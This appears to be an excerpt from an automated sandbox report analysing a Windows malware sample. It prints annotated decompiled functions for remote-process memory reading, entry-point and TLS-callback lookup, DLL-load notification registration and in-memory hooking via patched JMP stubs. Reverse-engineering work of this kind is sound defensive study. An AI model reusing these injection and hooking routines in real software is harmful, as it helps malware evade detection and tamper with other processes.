                                          Instruction addresses behind the listing above (the report's side column, in listing order; 0x00000000 marks a line with no instruction): 0x00ab442f 0x00ab4432 0x00ab4437 0x00ab443c 0x00ab4445 0x00ab444e 0x00ab4450 0x00ab4453 0x00ab445a 0x00ab445d 0x00ab445e 0x00ab445f 0x00ab4463 0x00ab4466 0x00ab4469 0x00ab4470 0x00ab4473 0x00ab4476 0x00ab447a 0x00ab447e 0x00ab4485 0x00ab4488 0x00ab448b 0x00ab448e 0x00ab4498 0x00ab449a 0x00ab44a2 0x00ab44a5 0x00ab44a5 0x00ab44ab 0x00ab44ae 0x00ab44b1 0x00ab44b4 0x00ab44b6 0x00ab44b9 0x00ab44be 0x00ab44be 0x00ab44c1 0x00ab44c6 0x00000000 0x00000000 0x00000000 0x00ab44c6 0x00ab44c8 0x00ab44d0

                                          APIs
                                          • GetModuleHandleW.KERNEL32(NTDLL.DLL,00000008,00B16E00,?,?,00AB3F20,?,?,?), ref: 00AB4429
                                          • LoadLibraryA.KERNEL32(ntdsapi.dll,00000001), ref: 00AB449A
                                          • FreeLibrary.KERNEL32(00000000), ref: 00AB44A5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Library$FreeHandleLoadModule
                                          • String ID: NTDLL.DLL$ntdsapi.dll
                                          • API String ID: 2140536961-4180381668
                                          • Opcode ID: 655e279bdb0dc59c357f3d485b842e9a06b0d612dfb37cfd04eb2809da120ba0
                                          • Instruction ID: 7f2da1e83dd950fc01ea3425423398a1f75c150002b852c2f8b2f8780b54a12b
                                          • Opcode Fuzzy Hash: 655e279bdb0dc59c357f3d485b842e9a06b0d612dfb37cfd04eb2809da120ba0
                                          • Instruction Fuzzy Hash: 61215071E016199FDB14DFA8D884AEEFBF8EF48310B14466AD809E7352D7709D41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 65%
                                          			/* Registers a DLL-load notification callback: _a4 = callback, _a8 = context,
                                          			   _a12 = receives the registration cookie (Vista+) or the list node (older OS).
                                          			   Returns 0 on success, 1 if registration fails, 8 if the fallback node
                                          			   allocation fails. */
                                          			E00AB44FB(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				intOrPtr* _t19;
                                          				intOrPtr* _t20;
                                          				_Unknown_base(*)()* _t22;
                                          				intOrPtr _t24;
                                          				intOrPtr* _t26;
                                          				void* _t28;
                                          
                                          				_t28 = 1;
                                          				if(GetVersion() < 6) {
                                          					/* Pre-Vista: ntdll has no LdrRegisterDllNotification, so the sample keeps
                                          					   its own circular list of callback nodes, headed at 0xb16d9c. */
                                          					__eflags =  *0xb16d9c;
                                          					if(__eflags != 0) {
                                          						L6:
                                          						_t26 = E00AB1490(0x10); /* LocalAlloc of a 16-byte node */
                                          						__eflags = _t26;
                                          						if(_t26 == 0) {
                                          							_t28 = 8;
                                          						} else {
                                          							 *((intOrPtr*)(_t26 + 8)) = _a4;  /* node->callback */
                                          							 *((intOrPtr*)(_t26 + 0xc)) = _a8; /* node->context */
                                          							 *((intOrPtr*)(_t26 + 4)) = _t26;
                                          							 *_t26 = _t26;
                                          							 *_a12 = _t26; /* the node doubles as the cookie */
                                          							_t24 =  *0xb16d9c; // 0x0
                                          							_t19 =  *((intOrPtr*)(_t24 + 4));
                                          							/* LIST_ENTRY-style insert in front of the head (Flink at +0, Blink at +4) */
                                          							 *_t26 = _t24;
                                          							 *((intOrPtr*)(_t26 + 4)) = _t19;
                                          							 *_t19 = _t26;
                                          							 *((intOrPtr*)(_t24 + 4)) = _t26;
                                          							goto L8;
                                          						}
                                          					} else {
                                          						/* First use: E00AB441C creates the list head (its API list above shows
                                          						   GetModuleHandleW(NTDLL.DLL), LoadLibraryA(ntdsapi.dll), FreeLibrary). */
                                          						_t20 = E00AB441C(__eflags);
                                          						 *0xb16d9c = _t20;
                                          						__eflags = _t20;
                                          						if(_t20 != 0) {
                                          							goto L6;
                                          						}
                                          					}
                                          				} else {
                                          					/* Vista and later: resolve ntdll!LdrRegisterDllNotification at run time and
                                          					   call LdrRegisterDllNotification(0, _a4, _a8, _a12); NTSTATUS 0 means success. */
                                          					_t22 = GetProcAddress(GetModuleHandleW(L"NTDLL.DLL"), "LdrRegisterDllNotification");
                                          					if(_t22 != 0) {
                                          						_push(_a12);
                                          						_push(_a8);
                                          						_push(_a4);
                                          						_push(0);
                                          						if( *_t22() == 0) {
                                          							L8:
                                          							_t28 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t28;
                                          			}










                                          APIs
                                          • GetVersion.KERNEL32(?,?,00AB4005,00AB3902,?,?,?,00AB3F20,?,?,?), ref: 00AB4502
                                          • GetModuleHandleW.KERNEL32(NTDLL.DLL,LdrRegisterDllNotification,?,00AB4005,00AB3902,?,?,?,00AB3F20,?,?,?), ref: 00AB4516
                                          • GetProcAddress.KERNEL32(00000000), ref: 00AB451D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AddressHandleModuleProcVersion
                                          • String ID: LdrRegisterDllNotification$NTDLL.DLL
                                          • API String ID: 3310240892-3368964806
                                          • Opcode ID: 4999ab3e86ca9921100356b48bb1888126532c1f110f12ea4f26628fb5ecbe3d
                                          • Instruction ID: b6587c00da337802617844434c68f00cf29a1f861d10c64ef1f999e5b362b261
                                          • Opcode Fuzzy Hash: 4999ab3e86ca9921100356b48bb1888126532c1f110f12ea4f26628fb5ecbe3d
                                          • Instruction Fuzzy Hash: 93111C70600A19AFCB15AFA9D800795BFFDBF48350F44C265F908CB263DA71DC818B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			/* Returns a LocalAlloc'd copy of _a4 with "64" toggled in front of the last '.':
                                          			   "name.dll" -> "name64.dll", "name64.dll" -> "name.dll". Only the byte two
                                          			   positions before the '.' is tested for '6', and ".dll" is always appended,
                                          			   whatever the original extension was. Returns NULL if _a4 is NULL or the
                                          			   allocation fails; a name without a '.' is returned unchanged. */
                                          			E00AB3127(CHAR* _a4) {
                                          				char* _t10;
                                          				char* _t11;
                                          				CHAR* _t13;
                                          
                                          				_t13 = 0;
                                          				if(_a4 != 0) {
                                          					_t13 = E00AB1490(lstrlenA(_a4) + 3); /* room for the extra "64" plus NUL */
                                          					if(_t13 != 0) {
                                          						lstrcpyA(_t13, _a4);
                                          						_t10 = StrRChrA(_t13, 0, 0x2e); /* last '.' */
                                          						if(_t10 != 0) {
                                          							if( *((char*)(_t10 - 2)) != 0x36) { /* 0x36 == '6' */
                                          								 *_t10 = 0x3436; /* overwrites ".x" with "64" (little-endian) */
                                          								_t11 =  &(_t10[2]);
                                          							} else {
                                          								_t11 =  &(_t10[0xfffffffffffffffe]); /* cut the "64" off */
                                          							}
                                          							 *_t11 = 0;
                                          							lstrcatA(_t13, ".dll");
                                          						}
                                          					}
                                          				}
                                          				return _t13;
                                          			}







                                          APIs
                                          • lstrlenA.KERNEL32(?,00000000,?,00AB1A7B,?,?,00AB1522,?,00000000), ref: 00AB3135
                                            • Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496
                                          • lstrcpyA.KERNEL32(00000000,?,-00000003,?,00AB1A7B,?,?,00AB1522,?,00000000), ref: 00AB314E
                                          • StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00AB1A7B,?,?,00AB1522,?,00000000), ref: 00AB3159
                                          • lstrcatA.KERNEL32(00000000,.dll,?,00AB1A7B,?,?,00AB1522,?,00000000), ref: 00AB317F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: AllocLocallstrcatlstrcpylstrlen
                                          • String ID: .dll
                                          • API String ID: 3822144076-2738580789
                                          • Opcode ID: f49007d4fd6e22b4b2874933b50fb3d25135b88f82bf51581f00304a0f07d68c
                                          • Instruction ID: d9bf9edfcd2954d62a894b6bdb05d837214011c6c9e820c01c78fa8b81ba0b83
                                          • Opcode Fuzzy Hash: f49007d4fd6e22b4b2874933b50fb3d25135b88f82bf51581f00304a0f07d68c
                                          • Instruction Fuzzy Hash: D0F09633905614BBCF226BB8EC09BDABE6CAF05791F044354F50596163E6618A0187E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			/* Returns the address at which code first executes in the target process _a4:
                                          			   the first TLS callback when the image declares one, otherwise
                                          			   base + AddressOfEntryPoint. Returns 0 if any read fails. */
                                          			E00AB1CE6(void* _a4) {
                                          				long _v8;
                                          				void* _v12;
                                          				void _v16;
                                          				void* _v28;
                                          				void _v40;
                                          				void* _t24;
                                          				intOrPtr _t32;
                                          				void* _t38;
                                          				void* _t42;
                                          				void* _t44;
                                          				void* _t47;
                                          				void* _t49;
                                          
                                          				_t47 = 0;
                                          				_t49 = E00AB1490(0x1000); /* 4 KiB scratch buffer (LocalAlloc) */
                                          				if(_t49 != 0) {
                                          					_t38 = _a4;
                                          					_t24 = E00AB2B39(_t38); /* remote image base: PROCESS_BASIC_INFORMATION, then a PEB read (see subcalls) */
                                          					_v12 = _t24;
                                          					/* Read the DOS header from the remote base, then the NT headers at base + e_lfanew (+0x3c). */
                                          					if(_t24 != 0 && ReadProcessMemory(_t38, _t24, _t49, 0x1000,  &_v8) != 0 && ReadProcessMemory(_t38,  *((intOrPtr*)(_t49 + 0x3c)) + _v12, _t49, 0x1000,  &_v8) != 0) {
                                          						_t42 = _v12;
                                          						_t47 =  *((intOrPtr*)(_t49 + 0x28)) + _t42; /* base + OptionalHeader.AddressOfEntryPoint */
                                          						_v12 = 0x8664; /* IMAGE_FILE_MACHINE_AMD64 */
                                          						_v16 = 0xd0; /* offset of the TLS data directory from the NT headers for PE32+ */
                                          						/* The decompiler dropped the condition here: FileHeader.Machine == 0x8664 ? 0xd0 : 0xc0
                                          						   (TLS directory entry for PE32+ vs. PE32). */
                                          						_t44 =  ==  ? _v16 : 0xc0;
                                          						_t32 =  *((intOrPtr*)(0xc0 + _t49)); /* TLS directory RVA, read at the PE32 offset regardless */
                                          						/* Requires a non-zero directory size at +4, reads the 0x18-byte IMAGE_TLS_DIRECTORY32
                                          						   (_v28 = AddressOfCallBacks, offset 12), then the callback array it points to. */
                                          						if(_t32 != 0 &&  *((intOrPtr*)(_t44 + _t49 + 4)) != 0 && ReadProcessMemory(_t38, _t32 + _t42,  &_v40, 0x18,  &_v8) != 0 && _v28 != 0 && ReadProcessMemory(_t38, _v28, _t49, 0x1000,  &_v8) != 0) {
                                          							/* Decompiler dropped the condition: if the first callback is non-NULL it replaces the entry point. */
                                          							_t47 =  !=  ?  *_t49 : _t47;
                                          						}
                                          					}
                                          					LocalFree(_t49);
                                          				}
                                          				return _t47;
                                          			}
















                                          APIs
                                            • Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496
                                            • Part of subcall function 00AB2B39: memset.NTDLL ref: 00AB2B54
                                            • Part of subcall function 00AB2B39: ZwQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,?,?,00000000,00000000), ref: 00AB2B6A
                                            • Part of subcall function 00AB2B39: ReadProcessMemory.KERNEL32(00000000,00AB1D0E,?,000001E8,?,?,00000000,00000000), ref: 00AB2B86
                                          • ReadProcessMemory.KERNEL32(?,00000000,00000000,00001000,00000000,00000000,00001000,00000000,?,?,?,?,?,?,?,00AB190F), ref: 00AB1D26
                                          • ReadProcessMemory.KERNEL32(?,?,00000000,00001000,00000000,?,?,?,?,?,?,00AB190F,?,00000000), ref: 00AB1D46
                                          • ReadProcessMemory.KERNEL32(?,00008664,?,00000018,00000000), ref: 00AB1D93
                                          • ReadProcessMemory.KERNEL32(?,00000000,00000000,00001000,00000000), ref: 00AB1DB1
                                          • LocalFree.KERNEL32(00000000,00000000,00001000,00000000,?,?,?,?,?,?,?,00AB190F,?,00000000), ref: 00AB1DC2
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: Process$MemoryRead$Local$AllocFreeInformationQuerymemset
                                          • String ID:
                                          • API String ID: 1829246340-0
                                          • Opcode ID: f31462e539dea1f6e3d812d511d2f6ed58d657b83b86a290a5d9169d48831a44
                                          • Instruction ID: 2bc86e487c6c2fb2df261f86b414774cf66be2fc23600c97fd6a902438ec9808
                                          • Opcode Fuzzy Hash: f31462e539dea1f6e3d812d511d2f6ed58d657b83b86a290a5d9169d48831a44
                                          • Instruction Fuzzy Hash: AB215C71A00614EFEB20DBA5CC55BEEBBFCEF44741F944455F94592182DB70E981CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			/* Handles a forwarded export. _a8 = the exporting module's headers, _a16 = an
                                          			   export record whose resolved address (+0x10) and name string (+8) are examined.
                                          			   An export address that lies inside the export directory is not code but a
                                          			   forwarder string "DLL.Function". Returns 1 when the address is ordinary code,
                                          			   0x1778 when _a12 is NULL, 8 on allocation failure, else the E00AB3B9F result. */
                                          			E00AB3802(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				char* _v24;
                                          				void* _v32;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t24;
                                          				char* _t32;
                                          				intOrPtr _t35;
                                          				struct HINSTANCE__* _t37;
                                          				intOrPtr _t40;
                                          				intOrPtr _t42;
                                          				intOrPtr _t44;
                                          				intOrPtr _t47;
                                          				void* _t50;
                                          
                                          				_t24 = _a8;
                                          				_t44 =  *((intOrPtr*)(_t24 + 0x3c)); /* e_lfanew */
                                          				_t42 = _a16;
                                          				_t47 =  *((intOrPtr*)(_t44 + _t24 + 0x78)); /* export directory RVA (NT headers + 0x78, PE32); +0x7c is its size */
                                          				_t53 = 1;
                                          				if( *((intOrPtr*)(_t42 + 0x10)) <= _t47 ||  *((intOrPtr*)(_t42 + 0x10)) >=  *((intOrPtr*)(_t44 + _t24 + 0x7c)) + _t47) {
                                          					L11:
                                          					return _t53;
                                          				} else {
                                          					if(_a12 == 0) {
                                          						_t53 = 0x1778;
                                          						goto L11;
                                          					}
                                          					_t11 = _t42 + 8; // 0x55c35d5e
                                          					_t50 = E00AB1490(lstrlenA( *_t11) + 1); /* working copy of the forwarder string */
                                          					if(_t50 == 0) {
                                          						_t53 = 8;
                                          						goto L11;
                                          					}
                                          					_t12 = _t42 + 8; // 0x55c35d5e
                                          					lstrcpyA(_t50,  *_t12);
                                          					_t32 = StrChrA(_t50, 0x2e); /* split "DLL.Function" at the first '.' */
                                          					if(_t32 != 0) {
                                          						 *_t32 = 0;
                                          						_v24 =  &(_t32[1]); /* function name */
                                          						_t35 = _a4;
                                          						_v32 = _t50;       /* module name */
                                          						_t16 = _t35 + 0x10; // 0x0
                                          						_v16 =  *_t16;
                                          						_t37 = GetModuleHandleA(_t50); /* the forwarded-to DLL must already be loaded */
                                          						_t63 = _t37;
                                          						if(_t37 != 0) {
                                          							_push(_t42);
                                          							_push(0);
                                          							_push(_t37);
                                          							_push( &_v32);
                                          							_t53 = E00AB3B9F(_t42, _t50, 1, _t63); /* writes to the target (VirtualProtect, see subcalls) */
                                          							if(_t53 == 0) {
                                          								_t40 = _a4;
                                          								 *((intOrPtr*)(_t40 + 0x14)) = _v12;
                                          								 *((intOrPtr*)(_t40 + 0x18)) = _v8;
                                          							}
                                          						}
                                          					}
                                          					LocalFree(_t50);
                                          					goto L11;
                                          				}
                                          			}






















                                          APIs
                                          • lstrlenA.KERNEL32(55C35D5E,00000004,00AB1B07,00000000,00B16948,?,00AB1B07), ref: 00AB383C
                                            • Part of subcall function 00AB1490: LocalAlloc.KERNEL32(00000000,?,00AB29EC,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB1496
                                          • lstrcpyA.KERNEL32(00000000,55C35D5E,00000001,?,00AB1B07), ref: 00AB3853
                                          • StrChrA.SHLWAPI(00000000,0000002E,?,00AB1B07), ref: 00AB385C
                                          • GetModuleHandleA.KERNEL32(00000000,?,00AB1B07), ref: 00AB387A
                                            • Part of subcall function 00AB3B9F: VirtualProtect.KERNEL32(00000000,00000004,00000040,00000000,00AB5488,0000001C,00AB3B7D,00B169A8,00000004,00B16948,00000004,00B169A0,00000002,00000000,?,00AB3F7B), ref: 00AB3BEA
                                            • Part of subcall function 00AB3B9F: VirtualProtect.KERNEL32(00000000,00000005,00000040,?,00B16948,00000004,00B169A8), ref: 00AB3C45
                                            • Part of subcall function 00AB3B9F: VirtualProtect.KERNEL32(?,00000005,?,?), ref: 00AB3C80
                                            • Part of subcall function 00AB3B9F: VirtualProtect.KERNEL32(00000000,00000004,?,?,00B16948,00000004,00B169A8), ref: 00AB3C97
                                            • Part of subcall function 00AB3B9F: EnterCriticalSection.KERNEL32(00B16E20), ref: 00AB3CAA
                                          • LocalFree.KERNEL32(00000000,?,00AB1B07), ref: 00AB38AA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$Local$AllocCriticalEnterFreeHandleModuleSectionlstrcpylstrlen
                                          • String ID:
                                          • API String ID: 1124667966-0
                                          • Opcode ID: 4120d1deecaaa9dcc156e024a94d359223fd58bc9467d759a36b4a3eed1b1b39
                                          • Instruction ID: 53e7996fa66eb8390a6d13639bdbb8409020d8b02044cfada1ee004b3179e631
                                          • Opcode Fuzzy Hash: 4120d1deecaaa9dcc156e024a94d359223fd58bc9467d759a36b4a3eed1b1b39
                                          • Instruction Fuzzy Hash: 7E216D32D002059FDB15EFA8D884BAA77BCBF48750F444169F8159B262DB71DE41CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 92%
                                          			E00AB2DC0(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                          				long _v8;
                                          				CHAR* _v12;
                                          				long _v16;
                                          				void _v20;
                                          				void* _t14;
                                          				long _t19;
                                          				void* _t27;
                                          				intOrPtr _t36;
                                          				struct _OVERLAPPED* _t37;
                                          
                                          				_t36 = _a4;
                                          				_t37 = 0;
                                          				_t14 = E00AB29D6(__ecx, _t36,  &_v12);
                                          				_t39 = _t14;
                                          				if(_t14 == 0) {
                                          					if(E00AB414A(__ebx, _t39, _t36, _a8) != 0) {
                                          						_t19 = E00AB43B8(_t36, _t16 - _t36);
                                          						_v8 = _t19;
                                          						if(_t19 != 0) {
                                          							_push(__ebx);
                                          							_t27 = CreateFileA(_v12, 0x80000000, 1, 0, 3, 0x80, 0); // GENERIC_READ, FILE_SHARE_READ, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL: _v12 is the running executable's own path (GetModuleFileNameA(0, ...) in E00AB29D6)
                                          							if(_t27 != 0xffffffff) {
                                          								if(SetFilePointer(_t27, _v8, 0, 0) == _v8 && ReadFile(_t27,  &_v20, 4,  &_v16, 0) != 0 && _v16 == 4) { // seek to _v8 from FILE_BEGIN and read one 4-byte value
                                          									_t37 = _v20 + _t36;
                                          								}
                                          								CloseHandle(_t27);
                                          							}
                                          						}
                                          					}
                                          					LocalFree(_v12);
                                          				}
                                          				return _t37;
                                          			}

                                          Instruction addresses for the C statements above, one per line in order (0x00000000 where a line has no instruction of its own):
                                          0x00ab2dcb
                                          0x00ab2dce
                                          0x00ab2dd2
                                          0x00ab2dd9
                                          0x00ab2ddb
                                          0x00ab2dee
                                          0x00ab2df4
                                          0x00ab2df9
                                          0x00ab2e00
                                          0x00ab2e02
                                          0x00ab2e1c
                                          0x00ab2e21
                                          0x00ab2e32
                                          0x00ab2e53
                                          0x00ab2e53
                                          0x00ab2e56
                                          0x00ab2e56
                                          0x00ab2e5c
                                          0x00ab2e00
                                          0x00ab2e60
                                          0x00ab2e60
                                          0x00ab2e6c

                                          APIs
                                            • Part of subcall function 00AB29D6: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,00000104,00000000,00000000,00AB14C8,00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8), ref: 00AB29F7
                                            • Part of subcall function 00AB29D6: LocalFree.KERNEL32(00000000,?,00AB28A0,00000000,00B16D50,?,?,?,00AB14C8,00000000), ref: 00AB2A0F
                                            • Part of subcall function 00AB414A: lstrcmpA.KERNEL32(?,00000004,00000004,00000004,00000000,00000004,00B169A8), ref: 00AB4196
                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000008,?,00AB19FA,?,?,00000000), ref: 00AB2E16
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E29
                                          • ReadFile.KERNEL32(00000000,?,00000004,?,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E40
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00AB2E56
                                          • LocalFree.KERNEL32(?,00000008,?,00AB19FA,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00AB2E60
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: File$FreeLocal$CloseCreateHandleModuleNamePointerReadlstrcmp
                                          • String ID:
                                          • API String ID: 883149339-0
                                          • Opcode ID: 55009df7d34432aed652086660cfc361a0cc8b64ca1bcf557fd2aca506c8080b
                                          • Instruction ID: f2ab83a9cc9106702f279f0f84e32981ba0d55d6c9f1eedd3a92db7f2197050a
                                          • Opcode Fuzzy Hash: 55009df7d34432aed652086660cfc361a0cc8b64ca1bcf557fd2aca506c8080b
                                          • Instruction Fuzzy Hash: B4119371910218BADB20ABA69C49FEF7FBDEF09760F100156F914A2092D631D94187A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E00AB3A4F(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                          				signed int _t25;
                                          				void* _t26;
                                          				void* _t44;
                                          				intOrPtr _t47;
                                          				long _t49;
                                          				void* _t50;
                                          
                                          				_push(0x18);
                                          				_push(0xab5498);
                                          				E00AB1000(__ebx, __edi, __esi);
                                          				_t49 = 0;
                                          				 *(_t50 - 0x1c) = 0;
                                          				 *(_t50 - 4) = 0;
                                          				_t47 =  *((intOrPtr*)(_t50 + 8));
                                          				_t25 =  *(_t47 + 0x1c) & 0x000000ff;
                                          				 *(_t50 - 0x20) = _t25;
                                          				_t26 = _t25 - 1;
                                          				if(_t26 == 0) {
                                          					L5:
                                          					if(VirtualProtect( *(_t47 + 0xc), 4, 0x40, _t50 - 0x1c) == 0) { // make the 4-byte slot at +0xc writable (0x40 = PAGE_EXECUTE_READWRITE)
                                          						_t49 = GetLastError();
                                          						 *((intOrPtr*)(_t50 - 0x28)) = _t49;
                                          					} else {
                                          						 *( *(_t47 + 0xc)) =  *(_t47 + 0x10); // overwrite the slot with the value at +0x10
                                          						 *(_t47 + 0x1c) =  *(_t47 + 0x1c) & 0xfffffeff; // clear bit 0x100 of the flags dword
                                          						VirtualProtect( *(_t47 + 0xc), 4,  *(_t50 - 0x1c), _t50 - 0x1c); // restore the saved protection
                                          					}
                                          					L9:
                                          					 *(_t50 - 4) =  *(_t50 - 4) | 0xffffffff;
                                          					return E00AB103B(_t49);
                                          				}
                                          				if(_t26 != 1) {
                                          					goto L9;
                                          				}
                                          				_t44 =  *(_t47 + 0x14);
                                          				if( *_t44 == 0xe9 && VirtualProtect(_t44, 5, 0x40, _t50 - 0x1c) != 0) { // 0xE9 = JMP rel32 opcode; make the 5-byte stub writable
                                          					 *((intOrPtr*)(_t44 + 1)) =  *((intOrPtr*)(_t47 + 8)) - _t44 - 5; // rel32 = destination (+8) - stub address - 5
                                          					VirtualProtect(_t44, 5,  *(_t50 - 0x1c), _t50 - 0x1c);
                                          				}
                                          				goto L5;
                                          			}

                                          Instruction addresses for the C statements above, one per line in order (0x00000000 where a line has no instruction of its own):
                                          0x00ab3a4f
                                          0x00ab3a51
                                          0x00ab3a56
                                          0x00ab3a5b
                                          0x00ab3a5d
                                          0x00ab3a60
                                          0x00ab3a63
                                          0x00ab3a66
                                          0x00ab3a6a
                                          0x00ab3a6d
                                          0x00ab3a70
                                          0x00ab3ab1
                                          0x00ab3ac4
                                          0x00ab3aef
                                          0x00ab3b07
                                          0x00ab3ac6
                                          0x00ab3acc
                                          0x00ab3ace
                                          0x00ab3ae1
                                          0x00ab3ae1
                                          0x00ab3b0a
                                          0x00ab3b0a
                                          0x00ab3b15
                                          0x00ab3b15
                                          0x00ab3a75
                                          0x00000000
                                          0x00000000
                                          0x00ab3a7b
                                          0x00ab3a81
                                          0x00ab3a9e
                                          0x00ab3aab
                                          0x00ab3aab
                                          0x00000000

                                          APIs
                                          • VirtualProtect.KERNEL32(?,00000005,00000040,00000000,00AB5498,00000018,00AB3A22,?,?,00AB3F2D,00000002,?,00AB3B38,?,00000000,00000000), ref: 00AB3A8C
                                          • VirtualProtect.KERNEL32(?,00000005,00000000,00000000,?,00AB3B38,?,00000000,00000000,00000000,?,00AB3F2D,?,?), ref: 00AB3AAB
                                          • VirtualProtect.KERNEL32(?,00000004,00000040,00000000,00AB5498,00000018,00AB3A22,?,?,00AB3F2D,00000002,?,00AB3B38,?,00000000,00000000), ref: 00AB3ABC
                                          • VirtualProtect.KERNEL32(?,00000004,00000000,00000000,?,00AB3B38,?,00000000,00000000,00000000,?,00AB3F2D,?,?), ref: 00AB3AE1
                                          • GetLastError.KERNEL32(?,00AB3B38,?,00000000,00000000,00000000,?,00AB3F2D,?,?), ref: 00AB3AE9
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.749055868.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true
                                          • Associated: 00000004.00000002.749044782.0000000000AB0000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749069471.0000000000AB5000.00000002.00020000.sdmp
                                          • Associated: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp
                                          • Associated: 00000004.00000002.752091234.0000000000B16000.00000004.00020000.sdmp
                                          • Associated: 00000004.00000002.752173878.0000000000B17000.00000002.00020000.sdmp
                                          Yara matches
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLast
                                          • String ID:
                                          • API String ID: 1469625949-0
